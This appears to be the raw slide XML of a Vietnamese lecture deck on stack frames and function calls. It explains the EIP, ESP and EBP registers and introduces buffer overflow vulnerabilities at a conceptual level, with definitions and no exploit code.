                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="5943600" y="4309686"/>
              <a:ext cx="507000"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000000"/>
                  </a:solidFill>
                  <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                  <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                  <a:sym typeface="Arial"/>
                </a:rPr>
                <a:t>EIP</a:t>
              </a:r>
              <a:endParaRPr sz="1400" b="1" kern="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:ea typeface="Courier New"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:sym typeface="Courier New"/>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:cxnSp>
          <p:nvCxnSpPr>
            <p:cNvPr id="27" name="Google Shape;316;p31">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{F3442A39-8CDA-B041-1B09-6FDCF7284B29}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvCxnSpPr>
              <a:cxnSpLocks/>
              <a:stCxn id="26" idx="3"/>
            </p:cNvCxnSpPr>
            <p:nvPr/>
          </p:nvCxnSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="6450600" y="4478943"/>
              <a:ext cx="559800" cy="0"/>
            </a:xfrm>
            <a:prstGeom prst="straightConnector1">
              <a:avLst/>
            </a:prstGeom>
            <a:noFill/>
            <a:ln w="9525"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DB07F084-5165-F0A6-C5D4-B16841B6CE97}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="2820300" y="2438400"/>
            <a:ext cx="797387" cy="338514"/>
            <a:chOff x="2209799" y="2499126"/>
            <a:chExt cx="797387" cy="338514"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="5" name="Google Shape;313;p31">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{B3025EBA-E89C-7BCC-10B4-5B484A39C9BB}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="2209799" y="2499126"/>
              <a:ext cx="547813" cy="338514"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:noFill/>
            <a:ln>
              <a:noFill/>
            </a:ln>
          </p:spPr>
          <p:txBody>
            <a:bodyPr spcFirstLastPara="1" wrap="square" lIns="45700" tIns="45700" rIns="45700" bIns="45700" anchor="t" anchorCtr="0">
              <a:spAutoFit/>
            </a:bodyPr>
            <a:lstStyle/>
            <a:p>
              <a:pPr algn="ctr">
                <a:buClr>
                  <a:srgbClr val="000000"/>
                </a:buClr>
                <a:buFont typeface="Arial"/>
                <a:buNone/>
              </a:pPr>
              <a:r>
                <a:rPr lang="en" sz="1600" b="1" kern="0">
                  <a:solidFill>
                    <a:srgbClr val="FF0000"/>
                  </a:solidFill>
                  <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                  <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                  <a:sym typeface="Arial"/>
                </a:rPr>
                <a:t>ESP</a:t>
              </a:r>
              <a:endParaRPr sz="1400" b="1" kern="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:ea typeface="Courier New"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:sym typeface="Courier New"/>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:cxnSp>
          <p:nvCxnSpPr>
            <p:cNvPr id="6" name="Google Shape;314;p31">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{B34ABBE4-1D35-D91D-849B-D0ECED98AB2A}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvCxnSpPr>
              <a:cxnSpLocks/>
              <a:stCxn id="5" idx="3"/>
            </p:cNvCxnSpPr>
            <p:nvPr/>
          </p:nvCxnSpPr>
          <p:spPr>
            <a:xfrm flipV="1">
              <a:off x="2757612" y="2668382"/>
              <a:ext cx="249574" cy="1"/>
            </a:xfrm>
            <a:prstGeom prst="straightConnector1">
              <a:avLst/>
            </a:prstGeom>
            <a:noFill/>
            <a:ln w="19050" cap="flat" cmpd="sng">
              <a:solidFill>
                <a:srgbClr val="FF0000"/>
              </a:solidFill>
              <a:prstDash val="solid"/>
              <a:round/>
              <a:headEnd type="none" w="med" len="med"/>
              <a:tailEnd type="triangle" w="med" len="med"/>
            </a:ln>
          </p:spPr>
        </p:cxnSp>
      </p:grpSp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="7" name="Straight Connector 6">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{8994DB4F-F99E-8D82-77A3-B9FBD90229FD}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5257800" y="381000"/>
            <a:ext cx="0" cy="1329139"/>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9980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5E61-C20A-2D1E-D062-E7F9B07B7C5E}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-GB"/>
              <a:t>Thực hiện lời gọi hàm</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{DE0B967B-5BD6-3312-7FFE-C6F9101242E0}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="457200" y="1784831"/>
            <a:ext cx="8058150" cy="2406170"/>
          </a:xfrm>
          <a:ln>
            <a:solidFill>
              <a:schemeClr val="accent1"/>
            </a:solidFill>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="514350" indent="-514350">
              <a:buFont typeface="+mj-lt"/>
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB"/>
              <a:t>Cất giá trị của các tham số vào stack theo thứ tự ngược khi khai báo/truyền</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="514350" indent="-514350">
              <a:buFont typeface="+mj-lt"/>
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB"/>
              <a:t>Cất giá trị của con trỏ EIP vào stack </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB">
                <a:sym typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              </a:rPr>
              <a:t> gọi là RIP</a:t>
            </a:r>
            <a:endParaRPr lang="en-GB"/>
          </a:p>
          <a:p>
            <a:pPr marL="514350" indent="-514350">
              <a:buFont typeface="+mj-lt"/>
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB"/>
              <a:t>Thay đổi giá trị của con trỏ EIP để trỏ vào lệnh đầu hàm được gọi</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Slide Number Placeholder 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{4865920A-C314-F0A2-3AA1-779A0749CF43}"/>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a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{8D0A1BEF-2407-4D05-85D4-59A7AB176A0B}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="457200" y="914400"/>
            <a:ext cx="6934200" cy="584775"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-GB" sz="3200"/>
              <a:t>Hàm gọi thực hiện</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1608415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5E61-C20A-2D1E-D062-E7F9B07B7C5E}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-GB"/>
              <a:t>Thực hiện lời gọi hàm</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{DE0B967B-5BD6-3312-7FFE-C6F9101242E0}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="457200" y="1499175"/>
            <a:ext cx="8058150" cy="3758625"/>
          </a:xfrm>
          <a:ln>
            <a:solidFill>
              <a:schemeClr val="accent1"/>
            </a:solidFill>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="514350" indent="-514350">
              <a:buFont typeface="+mj-lt"/>
              <a:buAutoNum type="arabicPeriod" startAt="4"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB"/>
              <a:t>Cất giá trị của EBP vào stack </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB">
                <a:sym typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              </a:rPr>
              <a:t> gọi là SFP</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="514350" indent="-514350">
              <a:buFont typeface="+mj-lt"/>
              <a:buAutoNum type="arabicPeriod" startAt="4"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB">
                <a:sym typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              </a:rPr>
              <a:t>Dịch chuyển EBP tới vị trí của ESP  EBP trỏ vào stack frame của hàm được gọi.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-GB">
                <a:sym typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              </a:rPr>
              <a:t>Giá trị của EBP không thay đổi trong suốt thời gian hàm được gọi thực thi</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="514350" indent="-514350">
              <a:buFont typeface="+mj-lt"/>
              <a:buAutoNum type="arabicPeriod" startAt="4"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB">
                <a:sym typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              </a:rPr>
              <a:t>Cấp phát các ô nhớ để lưu trữ biến cục bộ theo thứ tự khi khai báo</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="514350" indent="-514350">
              <a:buFont typeface="+mj-lt"/>
              <a:buAutoNum type="arabicPeriod" startAt="4"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB"/>
              <a:t>Hàm được gọi thực thi các lệnh khác</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Slide Number Placeholder 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{4865920A-C314-F0A2-3AA1-779A0749CF43}"/>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5" name="TextBox 4">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{8D0A1BEF-2407-4D05-85D4-59A7AB176A0B}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="457200" y="914400"/>
            <a:ext cx="6934200" cy="584775"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-GB" sz="3200"/>
              <a:t>Hàm được gọi thực hiện</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1144482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5E61-C20A-2D1E-D062-E7F9B07B7C5E}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-GB"/>
              <a:t>Trả về của hàm</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{DE0B967B-5BD6-3312-7FFE-C6F9101242E0}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="457200" y="1499175"/>
            <a:ext cx="8058150" cy="2691825"/>
          </a:xfrm>
          <a:ln>
            <a:solidFill>
              <a:schemeClr val="accent1"/>
            </a:solidFill>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="514350" indent="-514350">
              <a:buFont typeface="+mj-lt"/>
              <a:buAutoNum type="arabicPeriod" startAt="8"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB"/>
              <a:t>Dịch chuyển con trỏ ESP về vị trí trỏ bởi EBP </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB">
                <a:sym typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              </a:rPr>
              <a:t> Xóa vùng nhớ cấp phát cho biến cục bộ</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="514350" indent="-514350">
              <a:buFont typeface="+mj-lt"/>
              <a:buAutoNum type="arabicPeriod" startAt="8"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB">
                <a:sym typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              </a:rPr>
              <a:t>Lấy giá trị SFP gán cho con trỏ EBP  con trỏ EBP trỏ vào stack frame của hàm gọi</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="514350" indent="-514350">
              <a:buFont typeface="+mj-lt"/>
              <a:buAutoNum type="arabicPeriod" startAt="8"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB">
                <a:sym typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              </a:rPr>
              <a:t>Lấy giá trị RIP gán cho con trỏ EIP  con trỏ EIP trỏ vào lệnh thực thi của hàm gọi</a:t>
            </a:r>
            <a:endParaRPr lang="en-GB"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Slide Number Placeholder 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{4865920A-C314-F0A2-3AA1-779A0749CF43}"/>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a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{8D0A1BEF-2407-4D05-85D4-59A7AB176A0B}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="457200" y="914400"/>
            <a:ext cx="6934200" cy="584775"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-GB" sz="3200"/>
              <a:t>Hàm được gọi thực hiện</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6" name="TextBox 5">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{407714C1-0858-150C-253C-CB630F90FBD8}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="491412" y="4343400"/>
            <a:ext cx="6934200" cy="584775"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-GB" sz="3200"/>
              <a:t>Hàm gọi thực hiện</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="7" name="Content Placeholder 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{3CCC6B12-EFE2-362C-DA54-0F44D7B4E601}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="542925" y="4928175"/>
            <a:ext cx="8058150" cy="101542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t>11. Xóa vùng nhớ cấp phát để lưu trữ tham số truyền cho hàm được gọi</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="2459453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200"/>
              <a:t>2. Lỗi tràn bộ đệm</a:t>
            </a:r>
            <a:endParaRPr lang="en-GB" sz="360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6" name="Subtitle 5">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{5C5CCE8C-1811-B4A6-14D0-0D049031392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68056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A312-4FCC-4C05-8FCB-762EE554B51C}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>Khái niệm</a:t>
            </a:r>
            <a:endParaRPr lang="vi-VN"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{56CF9881-7209-4000-9B80-8EDDEC10730A}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="457200" y="1066800"/>
            <a:ext cx="8229600" cy="4648200"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2400"/>
              <a:t>Bộ đệm (Buffer): tập hợp liên tiếp các phần tử có kiểu dữ liệu xác định</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="2000"/>
              <a:t>Ví dụ: Trong ngôn ngữ C/C++, xâu là bộ đệm của các ký tự</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="2000"/>
              <a:t>Có thể hiểu theo nghĩa rộng: bộ đệm = vùng nhớ chứa dữ liệu</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2400"/>
              <a:t>Tràn bộ đệm (Buffer Overflow-BoF): Đ</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="vi-VN" sz="2400"/>
              <a:t>ư</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400"/>
              <a:t>a dữ liệu vào bộ đệm nhiều h</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="vi-VN" sz="2400"/>
              <a:t>ơ</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400"/>
              <a:t>n khả năng chứa của nó</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2400"/>
              <a:t>Lỗ hổng tràn bộ đệm: Không kiểm soát kích th</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="vi-VN" sz="2400"/>
              <a:t>ư</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400"/>
              <a:t>ớc dữ liệu đầu vào.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2400"/>
              <a:t>Tấn công tràn bộ đệm: Phần dữ liệu tràn ra khỏi bộ đệm làm thay đổi luồng thực thi của tiến trình.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="2000"/>
              <a:t>Dẫn tới một kết quả ngoài mong đợi</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2400"/>
              <a:t>Ngôn ngữ bị ảnh hưởng: C/C++</a:t>
            </a:r>
            <a:endParaRPr lang="vi-VN" sz="2400"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Slide Number Placeholder 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{66B6CF67-E9FE-4946-883B-6FEE39A30251}"/>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23986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9616-9AE4-43ED-A190-3A5F7D9BBDC5}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>C/C++ vẫn còn phổ biến(2024)</a:t>
            </a:r>
            <a:endParaRPr lang="vi-VN"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Slide Number Placeholder 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{0A055842-9C18-4BD1-A4D1-14096B1E7B8B}"/>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11" name="TextBox 10">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{9DBA8BF5-D46D-D7F5-2C44-49DD05391EB6}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="532107" y="838200"/>
            <a:ext cx="3657600" cy="338554"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-GB" sz="1600" i="1"/>
              <a:t>Nguồn: IEEE Spectrum</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="9" name="Picture 8">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{09D8A468-A240-89EE-EF98-2FA3916CA0C3}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="609600" y="4191000"/>
            <a:ext cx="6049574" cy="1828800"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="12" name="Picture 11">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
